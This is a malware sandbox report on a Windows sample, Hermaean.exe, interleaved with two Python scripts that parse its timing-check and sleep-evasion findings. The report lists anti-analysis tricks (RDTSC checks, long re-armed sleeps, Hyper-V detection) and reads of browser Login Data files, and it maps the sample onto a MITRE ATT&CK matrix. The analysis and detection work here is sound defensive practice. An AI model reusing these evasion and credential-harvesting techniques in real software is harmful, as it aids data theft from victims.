            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_35009997 push dword ptr [ebp+ecx-75h]; retf 6_2_350099A2
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_35008C74 push dword ptr [eax+ebp*8]; ret 6_2_35008C79
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_35009C77 pushfd ; iretd 6_2_35009C78
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_353090E4 push esp; retn 37B5h 6_2_3530A979
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_35309AC5 push ebp; iretd 6_2_35309AC8
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_35308578 pushad ; iretd 6_2_35308586
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_3530855A pushad ; iretd 6_2_3530855C
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_353085D0 pushad ; iretd 6_2_353085D6
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_3530A8D0 pushad ; iretd 6_2_3530A8A3
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_3530AB03 pushad ; iretd 6_2_3530AB04
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_385DD078 pushad ; retf 6_2_385DD079
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Local\Temp\nsxC682.tmp\System.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Glorification.Ove0
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Litiscontest.jpg
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Vandbreren.Ele222
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tiggerstavens.fes
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udgyd.ini
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.ini
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\aktioners.jpg
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\begrdeliges.pro
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\burdie.ini
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\cartographer.jpg
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\histographies.txt
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\icekhana.txt
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\manxman.jpg
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\modstaaet.jpg
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\musicianer.spi
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tartarizations
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tartarizations\ndder.jpg
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\romantiserendes.ini
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\Ostrich
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\Ostrich\semiquadrangle.ini
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\Ostrich\sugarcane.jpg
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\Ostrich\tinkle.jpg
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Liniestykkerne\Ostrich\unagitatedness.txt
            Source: C:\Users\user\Desktop\Hermaean.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Hermaean.exe | API/Special instruction interceptor: Address: 5B7892F
            Source: C:\Users\user\Desktop\Hermaean.exe | API/Special instruction interceptor: Address: 1FF892F
            Source: C:\Users\user\Desktop\Hermaean.exe | RDTSC instruction interceptor: First address: 5B18F15 second address: 5B18F15 instructions: 0x00000000 rdtsc 0x00000002 test dh, dh 0x00000004 test eax, ebx 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F7FB8B3C032h 0x0000000a test cl, dl 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e cmp eax, ecx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Hermaean.exe | RDTSC instruction interceptor: First address: 1F98F15 second address: 1F98F15 instructions: 0x00000000 rdtsc 0x00000002 test dh, dh 0x00000004 test eax, ebx 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F7FB85004E2h 0x0000000a test cl, dl 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e cmp eax, ecx 0x00000010 rdtsc
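The two RDTSC findings above carry the intercepted instruction window, which is the shape of a classic timing check: read the cycle counter twice, compare the delta against a threshold, and branch. The Python below is an added example, not code from Joe Sandbox or from the sample. It tokenizes that inline listing format (the tokenizer is written against the lines shown on this page and is an assumption of the example) and applies a heuristic of the example's own design: two rdtsc reads within a short window with a compare and a conditional branch in scope are flagged as a timing check. The report listing is copied verbatim from the first finding; the benign listing is constructed.

```python
"""Parse a Joe Sandbox "RDTSC instruction interceptor" listing and flag
timing-check shapes (two RDTSC reads bracketing a compare + conditional jump).

Added example; the listing format and the heuristic are assumptions of this
example, not part of the sandbox's own logic.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Copied verbatim from the report's first RDTSC finding.
REPORT_LISTING = (
    "0x00000000 rdtsc 0x00000002 test dh, dh 0x00000004 test eax, ebx "
    "0x00000006 cmp ebx, ecx 0x00000008 jc 00007F7FB8B3C032h 0x0000000a test cl, dl "
    "0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e cmp eax, ecx 0x00000010 rdtsc"
)
# Constructed benign listing: one timestamp read that is stored and returned.
BENIGN_LISTING = (
    "0x00000000 rdtsc 0x00000002 mov [esi], eax 0x00000005 mov [esi+4], edx 0x00000008 ret"
)

COMPARES = {"cmp", "sub"}
COND_BRANCHES = {"ja", "jae", "jb", "jbe", "jc", "jnc", "je", "jne", "jz", "jnz",
                 "jg", "jge", "jl", "jle", "js", "jns", "jo", "jno"}


@dataclass(frozen=True)
class Insn:
    offset: int
    mnemonic: str
    operands: str


# "0x<8 hex> <mnemonic> <operands>" repeated on one line; the operands run until
# the next "0x<8 hex>" token or the end of the string.
_INSN_RE = re.compile(r"0x([0-9a-fA-F]{8})\s+(\S+)(.*?)(?=\s0x[0-9a-fA-F]{8}\s|$)")


def parse_listing(text: str) -> list[Insn]:
    return [Insn(int(off, 16), mnem.lower(), ops.strip())
            for off, mnem, ops in _INSN_RE.findall(text.strip())]


def timing_check_windows(insns: list[Insn], window: int = 16) -> list[tuple[int, int]]:
    """Offsets (first_read, second_read) for each pair of consecutive rdtsc reads
    no more than `window` instructions apart whose surrounding code, from the
    first read to `window` instructions past the second, contains both a compare
    and a conditional branch. That is the delta-versus-threshold shape of a
    timing check; the loop in the report compares and branches between reads."""
    reads = [i for i, x in enumerate(insns) if x.mnemonic == "rdtsc"]
    hits = []
    for a, b in zip(reads, reads[1:]):
        if b - a > window:
            continue
        scope = insns[a + 1 : b + window]
        if (any(x.mnemonic in COMPARES for x in scope)
                and any(x.mnemonic in COND_BRANCHES for x in scope)):
            hits.append((insns[a].offset, insns[b].offset))
    return hits


def is_timing_check(text: str) -> bool:
    return bool(timing_check_windows(parse_listing(text)))


if __name__ == "__main__":
    for name, listing in (("report", REPORT_LISTING), ("benign", BENIGN_LISTING)):
        print(name, timing_check_windows(parse_listing(listing)))
```

The window of 16 instructions is deliberately generous: packers interleave junk such as the `test dh, dh` and `inc ebp` seen here between the reads, and a tight "rdtsc; rdtsc; sub" pattern is the exception rather than the rule. The heuristic will still miss checks that keep the comparison in a different basic block, so treat a hit as corroboration of the sandbox's own RDTSC signature, not as a replacement for it.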
            Source: C:\Users\user\Desktop\Hermaean.exe | Memory allocated: 4990000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Hermaean.exe | Memory allocated: 35320000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Hermaean.exe | Memory allocated: 35150000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time (51 further calls, in order): 599844, 599641, 599532, 599407, 599282, 599157, 599032, 598922, 598813, 598688, 598563, 598438, 598313, 598204, 598079, 597954, 597829, 597704, 597579, 597454, 597311, 596954, 596735, 596625, 596516, 596391, 596282, 596157, 596032, 595922, 595813, 595688, 595563, 595438, 595313, 595203, 595094, 594969, 594860, 594735, 594610, 594485, 594360, 594235, 594110, 593985, 593860, 593735, 593610, 593485, 593360
            Source: C:\Users\user\Desktop\Hermaean.exe | Window / User API: threadDelayed 851
            Source: C:\Users\user\Desktop\Hermaean.exe | Window / User API: threadDelayed 8955
            Source: C:\Users\user\Desktop\Hermaean.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxC682.tmp\System.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | API coverage: 3.1 %
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460 | Thread sleep time: -26747778906878833s >= -30000s
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460 | Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 3160 | Thread sleep count: 851 > 30
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460 | Thread sleep time: -599844s >= -30000s
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460 | Thread sleep time: -599641s >= -30000s
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 3160 | Thread sleep count: 8955 > 30
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460 | Thread sleep time: -599532s >= -30000s
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460 | Thread sleep count: 34 > 30
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460 | Thread sleep time (48 further calls, in order, each >= -30000s): -599407s, -599282s, -599157s, -599032s, -598922s, -598813s, -598688s, -598563s, -598438s, -598313s, -598204s, -598079s, -597954s, -597829s, -597704s, -597579s, -597454s, -597311s, -596954s, -596735s, -596625s, -596516s, -596391s, -596282s, -596157s, -596032s, -595922s, -595813s, -595688s, -595563s, -595438s, -595313s, -595203s, -595094s, -594969s, -594860s, -594735s, -594610s, -594485s, -594360s, -594235s, -594110s, -593985s, -593860s, -593735s, -593610s, -593485s, -593360s
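The thread-delay events above are the raw material for a sleep-evasion verdict: one effectively unbounded delay, a ten-minute delay, a long descending countdown of re-issued delays (a loop that re-arms its sleep until a wall-clock target passes, which is what sleep skipping in a sandbox provokes), and thousands of sleep calls on one thread. The Python below is an added example, not part of the Joe Sandbox report. It parses lines in the report's "Thread delayed" / "Thread sleep" format (the regular expression is written against the lines on this page and is an assumption of the example), reads the delay values as milliseconds (consistent with the page's "Contains long sleeps (>= 3 min)" signature, since 600000 ms is ten minutes, but still an assumption), and reports the three patterns. The sample lines are constructed from values in the report; the thresholds are the example's own.

```python
"""Turn Joe Sandbox "Thread delayed" / "Thread sleep" events into a sleep-evasion
verdict. Added example; the line format, the millisecond unit and the thresholds
are assumptions of this example, not the sandbox's own scoring.
"""
from __future__ import annotations

import re
from collections import defaultdict

# From the page's own signature "Contains long sleeps (>= 3 min)"; delay values are
# read as milliseconds (600000 = 10 min), an assumption of this example.
LONG_SLEEP_MS = 3 * 60 * 1000
# A run of at least COUNTDOWN_MIN_RUN delays, each shorter than the previous one by
# at most COUNTDOWN_STEP_MS, is treated as a loop re-arming its sleep after the
# sandbox returned early (example heuristic).
COUNTDOWN_MIN_RUN = 5
COUNTDOWN_STEP_MS = 1000

EVENT_RE = re.compile(
    r"Source:\s+(?P<src>.+?\.exe)"           # process path
    r"(?:\s+TID:\s*(?P<tid>\d+))?"           # optional thread id
    r"\s*\|?\s*Thread (?:"
    r"delayed: delay time: (?P<delay>\d+)"   # "Thread delayed: delay time: N"
    r"|sleep time: -(?P<sleep>\d+)s"         # "Thread sleep time: -Ns >= -30000s"
    r"|sleep count: (?P<count>\d+) > \d+)"   # "Thread sleep count: N > 30"
)

# Constructed from values in the report's findings above.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time: 600000",
    r"Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time: 599844",
    r"Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time: 599641",
    r"Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time: 599532",
    r"Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time: 599407",
    r"Source: C:\Users\user\Desktop\Hermaean.exe | Thread delayed: delay time: 599282",
    r"Source: C:\Users\user\Desktop\Hermaean.exe TID: 3160 | Thread sleep count: 8955 > 30",
    r"Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460 | Thread sleep time: -599157s >= -30000s",
    r"Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460 | Thread sleep count: 34 > 30",
]
# Constructed benign process: two short waits, no loop.
BENIGN_LINES = [
    r"Source: C:\Program Files\app\app.exe | Thread delayed: delay time: 100",
    r"Source: C:\Program Files\app\app.exe | Thread delayed: delay time: 250",
]


def parse_events(lines):
    """Yield (tid, kind, value); kind is "delay" (ms) or "count"."""
    for line in lines:
        m = EVENT_RE.search(line)
        if not m:
            continue
        tid = m.group("tid") or "?"
        if m.group("count") is not None:
            yield tid, "count", int(m.group("count"))
        else:
            yield tid, "delay", int(m.group("delay") or m.group("sleep"))


def countdown_runs(delays, min_run=COUNTDOWN_MIN_RUN, step_ms=COUNTDOWN_STEP_MS):
    """(first_ms, last_ms, length) for each run of delays that decrease by
    0 < step <= step_ms between consecutive calls."""
    runs, start = [], 0
    for i in range(1, len(delays) + 1):
        if i < len(delays) and 0 < delays[i - 1] - delays[i] <= step_ms:
            continue
        if i - start >= min_run:
            runs.append((delays[start], delays[i - 1], i - start))
        start = i
    return runs


def analyze(lines):
    delays_by_tid = defaultdict(list)
    count_alerts = {}
    for tid, kind, value in parse_events(lines):
        if kind == "delay":
            delays_by_tid[tid].append(value)
        else:
            count_alerts[tid] = max(count_alerts.get(tid, 0), value)
    all_delays = [d for ds in delays_by_tid.values() for d in ds]
    runs = [r for ds in delays_by_tid.values() for r in countdown_runs(ds)]
    summary = {
        "long_sleeps": sum(1 for d in all_delays if d >= LONG_SLEEP_MS),
        "max_delay_ms": max(all_delays, default=0),
        "countdown_runs": runs,
        "sleep_count_alerts": count_alerts,
    }
    summary["evasive"] = bool(summary["long_sleeps"] or runs or count_alerts)
    return summary


if __name__ == "__main__":
    print(analyze(REPORT_LINES))
    print(analyze(BENIGN_LINES))
```

The countdown detector is the part worth keeping: a single long sleep is easy to patch out, but a loop that recomputes the remaining time from the wall clock and sleeps again is what defeats naive sleep skipping, and the only visible symptom is exactly this slowly shrinking sequence of delay values.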
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_0040276E FindFirstFileW
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_00405770 CloseHandle, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, LdrInitializeThunk, FindNextFileW, FindClose
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_0040622B FindFirstFileW, FindClose
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_0040276E FindFirstFileW
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_00405770 CloseHandle, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, LdrInitializeThunk, FindNextFileW, FindClose
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_0040622B FindFirstFileW, FindClose
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C4B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWV
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004BE8000.00000004.00000020.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.2992279228.0000000004C4B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Hermaean.exe | API call chain: ExitProcess graph end node (graph_1-4490)
            Source: C:\Users\user\Desktop\Hermaean.exe | API call chain: ExitProcess graph end node (graph_1-4494)
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_00401752 lstrcatW, CompareFileTime, LdrInitializeThunk, SetFileTime, CloseHandle, lstrcatW
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_00406252 GetModuleHandleA, LoadLibraryA, GetProcAddress
            Source: C:\Users\user\Desktop\Hermaean.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Hermaean.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\Hermaean.exe | Process created: C:\Users\user\Desktop\Hermaean.exe "C:\Users\user\Desktop\Hermaean.exe"
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035538000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerLR
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035538000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: C:\Users\user\Desktop\Hermaean.exe | Queries volume information: C:\Users\user\Desktop\Hermaean.exe VolumeInformation
            Source: C:\Users\user\Desktop\Hermaean.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Hermaean.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Hermaean.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\Hermaean.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\Hermaean.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Hermaean.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_00405F0A GetVersion, LdrInitializeThunk, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree, lstrcatW, lstrlenW
            Source: C:\Users\user\Desktop\Hermaean.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR
            Source: Yara match | File source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Hermaean.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\Hermaean.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\Hermaean.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara match | File source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR
            Source: Yara match | File source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR

            Mitre Att&ck Matrix

            One row per line, columns separated by " | "; a number at the start of a cell is the counter shown in that cell of the original matrix.

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 215 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 3 Obfuscated Files or Information | Security Account Manager | 21 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 2 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
